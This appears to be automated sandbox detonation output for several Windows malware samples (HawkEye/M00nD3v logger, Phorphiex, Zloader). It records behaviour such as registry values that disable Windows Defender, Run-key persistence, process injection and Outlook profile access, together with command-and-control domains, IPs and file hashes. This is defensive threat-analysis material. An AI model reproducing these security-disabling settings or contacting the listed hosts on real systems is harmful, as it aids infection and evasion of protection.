| US | 8.8.8.8:53 | 215.82.3.50.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.97.45.5.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.70.101.46.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.78.255.130.in-addr.arpa | udp |
| DE | 144.76.133.38:53 | younika-hayde.bazar | udp |
| DE | 139.59.208.246:53 | younika-hayde.bazar | udp |
| DE | 172.104.136.243:53 | younika-hayde.bazar | udp |
| EC | 45.71.112.70:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 38.133.76.144.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.208.59.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.112.71.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.136.104.172.in-addr.arpa | udp |
| FR | 163.172.185.51:53 | younika-hayde.bazar | udp |
| FR | 87.98.175.85:53 | younika-hayde.bazar | udp |
| FR | 5.135.183.146:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 51.185.172.163.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.183.135.5.in-addr.arpa | udp |
| FR | 51.255.48.78:53 | younika-hayde.bazar | udp |
| FR | 188.165.200.156:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 78.48.255.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.200.165.188.in-addr.arpa | udp |
| FR | 147.135.185.78:53 | younika-hayde.bazar | udp |
| FR | 92.222.97.145:53 | younika-hayde.bazar | udp |
| FR | 51.255.211.146:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 78.185.135.147.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.97.222.92.in-addr.arpa | udp |
| GB | 159.89.249.249:53 | younika-hayde.bazar | udp |
| GB | 104.238.186.189:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 146.211.255.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.249.89.159.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.186.238.104.in-addr.arpa | udp |
| IN | 139.59.23.241:53 | younika-hayde.bazar | udp |
| IT | 193.183.98.66:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 241.23.59.139.in-addr.arpa | udp |
| IT | 94.177.171.127:53 | younika-hayde.bazar | udp |
| JP | 45.63.124.65:53 | younika-hayde.bazar | udp |
| LT | 212.24.98.54:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 127.171.177.94.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.124.63.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.98.24.212.in-addr.arpa | udp |
| MD | 178.17.170.179:53 | younika-hayde.bazar | udp |
| NL | 185.208.208.141:53 | younika-hayde.bazar | udp |
| NL | 82.196.9.45:53 | younika-hayde.bazar | udp |
| NL | 146.185.176.36:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 141.208.208.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.9.196.82.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.170.17.178.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.176.185.146.in-addr.arpa | udp |
| SE | 89.35.39.64:53 | younika-hayde.bazar | udp |
| RO | 89.18.27.167:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 64.39.35.89.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.27.18.89.in-addr.arpa | udp |
| RU | 77.73.68.161:53 | younika-hayde.bazar | udp |
| RU | 91.217.137.37:53 | younika-hayde.bazar | udp |
| RU | 185.117.154.144:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 144.154.117.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.68.73.77.in-addr.arpa | udp |
| SE | 176.126.70.119:53 | younika-hayde.bazar | udp |
| SG | 139.99.96.146:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 146.96.99.139.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.70.126.176.in-addr.arpa | udp |
| UA | 217.12.210.54:53 | younika-hayde.bazar | udp |
| GB | 185.164.136.225:53 | younika-hayde.bazar | udp |
| US | 192.52.166.110:53 | younika-hayde.bazar | udp |
| US | 63.231.92.27:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 225.136.164.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.166.52.192.in-addr.arpa | udp |
| CA | 66.70.211.246:53 | younika-hayde.bazar | udp |
| US | 96.47.228.108:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 246.211.70.66.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.228.47.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.92.231.63.in-addr.arpa | udp |
| US | 45.32.160.206:53 | younika-hayde.bazar | udp |
| US | 128.52.130.209:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 206.160.32.45.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.130.52.128.in-addr.arpa | udp |
| US | 35.196.105.24:53 | younika-hayde.bazar | udp |
| US | 172.98.193.42:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 42.193.98.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.105.196.35.in-addr.arpa | udp |
| US | 162.248.241.94:53 | younika-hayde.bazar | udp |
| US | 107.172.42.186:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 94.241.248.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.42.172.107.in-addr.arpa | udp |
| US | 167.99.153.82:53 | younika-hayde.bazar | udp |
| US | 138.197.25.214:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 214.25.197.138.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.153.99.167.in-addr.arpa | udp |
| US | 69.164.196.21:53 | younika-hayde.bazar | udp |
| US | 8.8.8.8:53 | 21.196.164.69.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.10.44.20.in-addr.arpa | udp |
Files
Analysis: behavioral14
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
91s
Max time network
159s
Command Line
Signatures
HawkEye Reborn
Hawkeye_reborn family
M00nd3v_Logger
M00nd3v_logger family
M00nD3v Logger payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | bot.whatismyipaddress.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3920 set thread context of 220 | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
"C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe"
C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
"{path}"
C:\Users\Admin\AppData\Local\Temp\hyundai steel-pipe- job 8010.exe
"{path}"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | bot.whatismyipaddress.com | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
Files
memory/3920-0-0x0000000074E82000-0x0000000074E83000-memory.dmp
memory/3920-1-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/3920-2-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/3920-3-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/220-4-0x0000000000400000-0x0000000000490000-memory.dmp
memory/3920-6-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/220-7-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/220-8-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/220-9-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/220-10-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/220-12-0x0000000074E80000-0x0000000075431000-memory.dmp
memory/220-13-0x0000000074E80000-0x0000000075431000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
155s
Command Line
Signatures
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Processes
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\inps_979.xls"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | roaming.officeapps.live.com | udp |
| IE | 52.109.76.243:443 | roaming.officeapps.live.com | tcp |
| US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.76.109.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.143.182.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
memory/4904-2-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp
memory/4904-1-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp
memory/4904-3-0x00007FFA4D26D000-0x00007FFA4D26E000-memory.dmp
memory/4904-0-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp
memory/4904-6-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-7-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-5-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp
memory/4904-9-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-8-0x00007FFA0D250000-0x00007FFA0D260000-memory.dmp
memory/4904-4-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-11-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-12-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-13-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-10-0x00007FFA0B1F0000-0x00007FFA0B200000-memory.dmp
memory/4904-15-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-14-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-16-0x00007FFA0B1F0000-0x00007FFA0B200000-memory.dmp
memory/4904-17-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-19-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-21-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-20-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-18-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
memory/4904-31-0x00007FFA4D1D0000-0x00007FFA4D3C5000-memory.dmp
Analysis: behavioral12
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
148s
Max time network
157s
Command Line
Signatures
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
Phorphiex family
Phorphiex, Phorpiex
Windows security bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1" | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WCfgMgr32 = "C:\\Windows\\3049586940303040\\wcfgmgr32.exe" | C:\Users\Admin\AppData\Local\Temp\good.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WCfgMgr32 = "C:\\Windows\\3049586940303040\\wcfgmgr32.exe" | C:\Users\Admin\AppData\Local\Temp\good.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\3049586940303040\wcfgmgr32.exe | C:\Users\Admin\AppData\Local\Temp\good.exe | N/A |
| File opened for modification | C:\Windows\3049586940303040\wcfgmgr32.exe | C:\Users\Admin\AppData\Local\Temp\good.exe | N/A |
| File opened for modification | C:\Windows\3049586940303040 | C:\Users\Admin\AppData\Local\Temp\good.exe | N/A |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\good.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\3049586940303040\wcfgmgr32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 620 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\good.exe | C:\Windows\3049586940303040\wcfgmgr32.exe |
| PID 620 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\good.exe | C:\Windows\3049586940303040\wcfgmgr32.exe |
| PID 620 wrote to memory of 4016 | N/A | C:\Users\Admin\AppData\Local\Temp\good.exe | C:\Windows\3049586940303040\wcfgmgr32.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\good.exe
"C:\Users\Admin\AppData\Local\Temp\good.exe"
C:\Windows\3049586940303040\wcfgmgr32.exe
C:\Windows\3049586940303040\wcfgmgr32.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.210.23.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp |
| NL | 92.63.197.153:80 | tcp | |
| US | 8.8.8.8:53 | efhoahegue.ru | udp |
| DE | 92.246.89.93:80 | efhoahegue.ru | tcp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | afhoahegue.ru | udp |
| US | 8.8.8.8:53 | rfhoahegue.ru | udp |
| US | 8.8.8.8:53 | tfhoahegue.ru | udp |
| US | 8.8.8.8:53 | xfhoahegue.ru | udp |
| US | 8.8.8.8:53 | efhoahegue.su | udp |
| US | 8.8.8.8:53 | afhoahegue.su | udp |
| US | 8.8.8.8:53 | rfhoahegue.su | udp |
| US | 8.8.8.8:53 | tfhoahegue.su | udp |
| US | 8.8.8.8:53 | xfhoahegue.su | udp |
| NL | 92.63.197.153:80 | tcp | |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| NL | 92.63.197.153:80 | tcp | |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| NL | 92.63.197.153:80 | tcp | |
| NL | 92.63.197.153:80 | tcp | |
| NL | 92.63.197.153:80 | tcp |
Files
memory/620-0-0x0000000000400000-0x0000000002CE4000-memory.dmp
memory/620-2-0x0000000002E80000-0x0000000002F80000-memory.dmp
memory/620-3-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Windows\3049586940303040\wcfgmgr32.exe
| MD5 | b034e2a7cd76b757b7c62ce514b378b4 |
| SHA1 | 27d15f36cb5e3338a19a7f6441ece58439f830f2 |
| SHA256 | 90d3580e187b631a9150bbb4a640b84c6fa990437febdc42f687cc7b3ce1deac |
| SHA512 | 1cea6503cf244e1efb6ef68994a723f549126fc89ef8a38c76cdcc050d2a4524e96402591d1d150d927a12dcac81084a8275a929cf6e5933fdf62502c9c84385 |
memory/4016-9-0x0000000000400000-0x0000000002CE4000-memory.dmp
memory/620-10-0x0000000000400000-0x0000000002CE4000-memory.dmp
memory/4016-12-0x0000000000400000-0x0000000002CE4000-memory.dmp
Analysis: behavioral18
Detonation Overview
Submitted
2024-12-04 19:31
Reported
2024-12-04 19:36
Platform
win10v2004-20241007-en
Max time kernel
147s
Max time network
152s
Command Line
Signatures
Zloader family
Zloader, Terdot, DELoader, ZeusSphinx
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4920 set thread context of 2604 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\SysWOW64\msiexec.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4576 wrote to memory of 4920 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4576 wrote to memory of 4920 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4576 wrote to memory of 4920 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 4920 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4920 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4920 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4920 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
| PID 4920 wrote to memory of 2604 | N/A | C:\Windows\SysWOW64\rundll32.exe | C:\Windows\SysWOW64\msiexec.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\june9.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\june9.dll,#1
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.129.81.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.49.80.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | snnmnkxdhflwgthqismb.com | udp |
| US | 8.8.8.8:53 | snnmnkxdhflwgthqismb.com | udp |
| US | 8.8.8.8:53 | snnmnkxdhflwgthqismb.com | udp |
| US | 8.8.8.8:53 | nlbmfsyplohyaicmxhum.com | udp |
